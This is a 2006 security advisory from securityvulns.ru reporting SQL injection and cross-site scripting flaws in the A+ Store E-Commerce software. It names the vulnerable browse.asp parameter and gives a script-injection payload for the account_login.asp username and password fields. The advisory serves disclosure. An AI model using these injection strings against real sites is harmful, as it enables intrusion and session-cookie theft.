Computer Security

Security Advisory: A+ Store E-Commerce[ injection sql & xss (post) ]
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection

  MetaCart e-Shop [multiples injection sql (get & post)]

  E-commerce Kit 1 PayPal Edition [ injection sql ]

  TorrentFlux 2.2 Arbitrary File Creation/Overwrite/De
letion & Command Execution Vulnerablities

From:laurent gaffié <saps.audit_(at)_gmail.com>
Date:16.11.2006
Subject:A+ Store E-Commerce[ injection sql & xss (post) ]

vendor site:http://www.webinhabit.com/
product:A+ Store E-Commerce
bug:injection sql & xss post
risk:medium


injection sql (get) :
http://site.com/browse.asp?ParentID='[sql]

xss post :
in /account_login.asp:
username = </textarea>'"><script>alert(document.
cookie)</script></textarea>'"><script>alert(
document.cookie)</script>
passwd = </textarea>'"><script>alert(document.
cookie)</script></textarea>'"><script>alert(
document.cookie)</script>


laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: saps.audit@gmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru